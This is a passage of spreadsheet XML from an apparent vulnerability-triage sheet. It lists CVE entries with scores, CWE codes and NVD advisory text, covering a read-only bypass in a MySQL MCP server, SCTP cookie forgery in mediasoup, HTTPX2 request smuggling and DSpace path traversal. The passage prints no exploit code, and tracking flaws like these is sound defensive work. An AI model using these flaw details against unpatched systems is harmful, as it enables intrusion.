        <v>5.7</v>
      </c>
      <c r="E872" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F872" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G872" s="5" t="inlineStr"/>
      <c r="H872" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I872" s="5" t="inlineStr"/>
      <c r="J872" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K872" s="5" t="inlineStr"/>
      <c r="L872" s="5" t="inlineStr"/>
      <c r="M872" s="5" t="inlineStr"/>
      <c r="N872" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O872" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P872" s="5" t="inlineStr"/>
      <c r="Q872" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R872" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in the mutable SQL detector component in Amazon awslabs mysql-mcp-server might allow context-dependent actors to bypass the read-only enforcement gate and reach file-read and file-write SQL sinks via SQL inline comments that the regex engine does not treat as whitespace.
To remediate this issue, users should upgrade to version 1.0.23.</t>
        </is>
      </c>
      <c r="S872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85788</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B873" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55663</t>
        </is>
      </c>
      <c r="D873" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E873" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F873" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G873" s="5" t="inlineStr"/>
      <c r="H873" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I873" s="5" t="inlineStr"/>
      <c r="J873" s="5" t="inlineStr"/>
      <c r="K873" s="5" t="inlineStr"/>
      <c r="L873" s="5" t="inlineStr"/>
      <c r="M873" s="5" t="inlineStr"/>
      <c r="N873" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O873" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P873" s="5" t="inlineStr"/>
      <c r="Q873" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R873" s="5" t="inlineStr">
        <is>
          <t>mediasoup is a WebRTC video conferencing system. From version 3.20.0 until 3.20.6 for the npm package and from 0.22.0 until 0.22.5 for the Rust crate, mediasoup's built-in SCTP stack authenticates state cookies using only the hardcoded msworker and 0xAD81 magic values instead of a per-instance secret and HMAC, contrary to RFC 9260 Section 5.1.3. The cookie structure and validation in worker/include/RTC/SCTP/association/StateCookie.hpp and worker/src/RTC/SCTP/association/StateCookie.cpp allow an on-path attacker targeting PlainTransport or PipeTransport with SCTP enabled and without DTLS protection to forge a COOKIE-ECHO whose packet verification tag matches the attacker-controlled localVerificationTag. The forged cookie passes StateCookie::IsMediasoupStateCookie() and Association::HandleReceivedCookieEchoChunk(), establishes an unauthorized SCTP association, and permits DataChannel message injection as a trusted peer. WebRtcTransport is not affected because its SCTP runs inside DTLS. This issue is fixed in npm version 3.20.6 and Rust crate version 0.22.5.</t>
        </is>
      </c>
      <c r="S873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55663</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B874" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79730</t>
        </is>
      </c>
      <c r="D874" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E874" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F874" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G874" s="5" t="inlineStr"/>
      <c r="H874" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I874" s="5" t="inlineStr"/>
      <c r="J874" s="5" t="inlineStr"/>
      <c r="K874" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L874" s="5" t="inlineStr"/>
      <c r="M874" s="5" t="inlineStr"/>
      <c r="N874" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O874" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P874" s="5" t="inlineStr"/>
      <c r="Q874" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R874"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S874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79730</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B875" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79967</t>
        </is>
      </c>
      <c r="D875" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E875" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F875" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G875" s="5" t="inlineStr"/>
      <c r="H875" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I875" s="5" t="inlineStr"/>
      <c r="J875" s="5" t="inlineStr"/>
      <c r="K875" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L875" s="5" t="inlineStr"/>
      <c r="M875" s="5" t="inlineStr"/>
      <c r="N875" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O875" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P875" s="5" t="inlineStr"/>
      <c r="Q875" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R875"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S875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79967</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B876" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79970</t>
        </is>
      </c>
      <c r="D876" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E876" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F876" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G876" s="5" t="inlineStr"/>
      <c r="H876" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I876" s="5" t="inlineStr"/>
      <c r="J876" s="5" t="inlineStr"/>
      <c r="K876" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L876" s="5" t="inlineStr"/>
      <c r="M876" s="5" t="inlineStr"/>
      <c r="N876" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O876" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P876" s="5" t="inlineStr"/>
      <c r="Q876" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R876" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Verification of Cryptographic Signature vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="S876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79970</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B877" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84380</t>
        </is>
      </c>
      <c r="D877" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E877" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F877" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G877" s="5" t="inlineStr"/>
      <c r="H877" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I877" s="5" t="inlineStr"/>
      <c r="J877" s="5" t="inlineStr"/>
      <c r="K877" s="5" t="inlineStr"/>
      <c r="L877" s="5" t="inlineStr"/>
      <c r="M877" s="5" t="inlineStr"/>
      <c r="N877" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O877" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P877" s="5" t="inlineStr"/>
      <c r="Q877" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R877" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.11.0, Request._prepare() in src/httpx2/httpx2/_models.py can add a body-derived Content-Length header to a request that already contains a caller-supplied Transfer-Encoding header because its setdefault() processing checks each default header independently rather than treating the two framing headers as mutually exclusive. Fixed-size byte, JSON, form, and known-length multipart bodies can therefore be serialized over HTTP/1.1 with both headers, allowing request smuggling or connection desynchronization when downstream intermediaries disagree about which framing header takes precedence. This issue is fixed in version 2.11.0.</t>
        </is>
      </c>
      <c r="S877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84380</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B878" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C878" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51619</t>
        </is>
      </c>
      <c r="D878" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E878" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F878" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G878" s="5" t="inlineStr"/>
      <c r="H878" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I878" s="5" t="inlineStr"/>
      <c r="J878" s="5" t="inlineStr"/>
      <c r="K878" s="5" t="inlineStr"/>
      <c r="L878" s="5" t="inlineStr"/>
      <c r="M878" s="5" t="inlineStr"/>
      <c r="N878" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O878" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P878" s="5" t="inlineStr"/>
      <c r="Q878" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R878" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Thesycon DPC Latency Checker driver (dpc.sys) thru 1.4.0 allows local unprivileged users to cause a denial-of-service (BSOD) condition on Windows systems. The driver exposes an IOCTL interface (0x81772008) that accepts user-controlled input without validating pointers before passing them to kernel APIs. Specifically, it dereferences a user-supplied pointer and uses the resulting value in a call to ExSetTimerResolution, leading to an arbitrary kernel memory access. Exploiting this flaw results in a system crash.</t>
        </is>
      </c>
      <c r="S878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51619</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B879" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17440</t>
        </is>
      </c>
      <c r="D879" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E879" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F879" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G879" s="5" t="inlineStr"/>
      <c r="H879" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I879" s="5" t="inlineStr"/>
      <c r="J879" s="5" t="inlineStr"/>
      <c r="K879" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="L879" s="5" t="inlineStr"/>
      <c r="M879" s="5" t="inlineStr"/>
      <c r="N879" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O879" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P879" s="5" t="inlineStr"/>
      <c r="Q879" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R879" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a local attacker to cause a denial of service due to uncontrolled recursion.</t>
        </is>
      </c>
      <c r="S879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17440</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B880" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17469</t>
        </is>
      </c>
      <c r="D880" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E880" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F880" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G880" s="5" t="inlineStr"/>
      <c r="H880" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I880" s="5" t="inlineStr"/>
      <c r="J880" s="5" t="inlineStr"/>
      <c r="K880" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="L880" s="5" t="inlineStr"/>
      <c r="M880" s="5" t="inlineStr"/>
      <c r="N880" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O880" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P880" s="5" t="inlineStr"/>
      <c r="Q880" s="5" t="inlineStr">
        <is>
          <t>CWE-193, CWE-787</t>
        </is>
      </c>
      <c r="R880" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local authenticated attacker to cause a denial of service due to an off-by-one write in the LPD queue name parser.</t>
        </is>
      </c>
      <c r="S880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17469</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B881" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19649</t>
        </is>
      </c>
      <c r="D881" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E881" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F881" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G881" s="5" t="inlineStr"/>
      <c r="H881" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I881" s="5" t="inlineStr"/>
      <c r="J881" s="5" t="inlineStr"/>
      <c r="K881" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="L881" s="5" t="inlineStr"/>
      <c r="M881" s="5" t="inlineStr"/>
      <c r="N881" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O881" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P881" s="5" t="inlineStr"/>
      <c r="Q881" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R881" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a local attacker to obtain sensitive information due to improper logging of database credentials.</t>
        </is>
      </c>
      <c r="S881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19649</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B882" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20500</t>
        </is>
      </c>
      <c r="D882" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E882" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F882" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G882" s="5" t="inlineStr"/>
      <c r="H882" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I882" s="5" t="inlineStr"/>
      <c r="J882" s="5" t="inlineStr"/>
      <c r="K882" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2716, mediatek:mt2716_firmware, mediatek:mt6835, mediatek:mt6835_firmware, mediatek:mt6858, mediatek:mt6858_firmware, mediatek:mt6878, mediatek:mt6878_firmware, mediatek:mt6881, mediatek:mt6881_firmware</t>
        </is>
      </c>
      <c r="L882" s="5" t="inlineStr"/>
      <c r="M882" s="5" t="inlineStr"/>
      <c r="N882" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O882" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P882" s="5" t="inlineStr"/>
      <c r="Q882" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R882" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible system crash due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01810811; Issue ID: MSV-9232.</t>
        </is>
      </c>
      <c r="S882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20500</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B883" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21099</t>
        </is>
      </c>
      <c r="D883" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E883" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F883" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G883" s="5" t="inlineStr"/>
      <c r="H883" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I883" s="5" t="inlineStr"/>
      <c r="J883" s="5" t="inlineStr"/>
      <c r="K883" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L883" s="5" t="inlineStr"/>
      <c r="M883" s="5" t="inlineStr"/>
      <c r="N883" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O883" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P883" s="5" t="inlineStr"/>
      <c r="Q883" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="R883" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SettingsProvider prior to SMR Sep-2026 Release 1 allows local attackers to access sensitive information.</t>
        </is>
      </c>
      <c r="S883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21099</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B884" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39020</t>
        </is>
      </c>
      <c r="D884" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E884" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F884" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G884" s="5" t="inlineStr"/>
      <c r="H884" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I884" s="5" t="inlineStr"/>
      <c r="J884" s="5" t="inlineStr"/>
      <c r="K884" s="5" t="inlineStr"/>
      <c r="L884" s="5" t="inlineStr"/>
      <c r="M884" s="5" t="inlineStr"/>
      <c r="N884" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O884" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P884" s="5" t="inlineStr"/>
      <c r="Q884" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R884" s="5" t="inlineStr">
        <is>
          <t>An issue in WIngs3D v.2.4.1 allows a local attacker to cause a denial of service via a crafted Wavefront OBJ file</t>
        </is>
      </c>
      <c r="S884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39020</t>
        </is>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B885" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49313</t>
        </is>
      </c>
      <c r="D885" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E885" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F885" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G885" s="5" t="inlineStr"/>
      <c r="H885" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I885" s="5" t="inlineStr"/>
      <c r="J885" s="5" t="inlineStr"/>
      <c r="K885" s="5" t="inlineStr"/>
      <c r="L885" s="5" t="inlineStr"/>
      <c r="M885" s="5" t="inlineStr"/>
      <c r="N885" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O885" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P885" s="5" t="inlineStr"/>
      <c r="Q885" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="R885" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the app lock module.
Impact: Successful exploitation of this vulnerability may affect service confidentiality.</t>
        </is>
      </c>
      <c r="S885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49313</t>
        </is>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B886" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49831</t>
        </is>
      </c>
      <c r="D886" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E886" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F886" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G886" s="5" t="inlineStr"/>
      <c r="H886" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I886" s="5" t="inlineStr"/>
      <c r="J886" s="5" t="inlineStr"/>
      <c r="K886" s="5" t="inlineStr"/>
      <c r="L886" s="5" t="inlineStr"/>
      <c r="M886" s="5" t="inlineStr"/>
      <c r="N886" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O886" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P886" s="5" t="inlineStr"/>
      <c r="Q886" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R886" s="5" t="inlineStr">
        <is>
          <t>DSpace open source software is a repository application which provides durable access to digital resources. Prior to versions 7.6.7, 8.4, 9.3, and 10.0, the Curation Task feature allows an output path to be used by the reporter (-r parameter), typically used to stream results and status of curation task operations. It is not restricted to any particular base path, meaning that any path writable by the DSpace (often 'tomcat') user is allowed. This constitutes a Path Traversal Vulnerability in the curate script. This issue has been patched in versions 7.6.7, 8.4, 9.3, and 10.0.</t>
        </is>
      </c>
      <c r="S886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49831</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B887" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49833</t>
        </is>
      </c>
      <c r="D887" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E887" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F887" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G887" s="5" t="inlineStr"/>
      <c r="H887" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I887" s="5" t="inlineStr"/>
      <c r="J887" s="5" t="inlineStr"/>
      <c r="K887" s="5" t="inlineStr"/>
      <c r="L887" s="5" t="inlineStr"/>
      <c r="M887" s="5" t="inlineStr"/>
      <c r="N887" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O887" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P887" s="5" t="inlineStr"/>
      <c r="Q887" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R887" s="5" t="inlineStr">
        <is>
          <t>DSpace open source software is a repository application which provides durable access to digital resources. From versions 8.0-rc1 to before 8.4, 9.0-rc1 to before 9.3, and 10-rc1 to before 10.0, a path traversal vulnerability is possible via the COAR Notify / LDN service in DSpace. The attacker MUST already have DSpace administrator credentials in order to perform the attack. When reading a file input stream of an "inbound pattern" / "template", used to generate an LDN message, the LDN class does not check for path traversal or restrict the templates to a known base path. This could allow an untrusted file from elsewhere in the file system (e.g. an export log, a bitstream path, a temporary file) to be read and interpreted as an Apache Velocity template. This issue has been patched in versions 8.4, 9.3, and 10.0.</t>
        </is>
      </c>
      <c r="S887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49833</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B888" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52772</t>
        </is>
      </c>
      <c r="D888" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E888" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F888" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G888" s="5" t="inlineStr"/>
      <c r="H888" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I888" s="5" t="inlineStr"/>
      <c r="J888" s="5" t="inlineStr"/>
      <c r="K888" s="5" t="inlineStr"/>
      <c r="L888" s="5" t="inlineStr"/>
      <c r="M888" s="5" t="inlineStr"/>
      <c r="N888" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
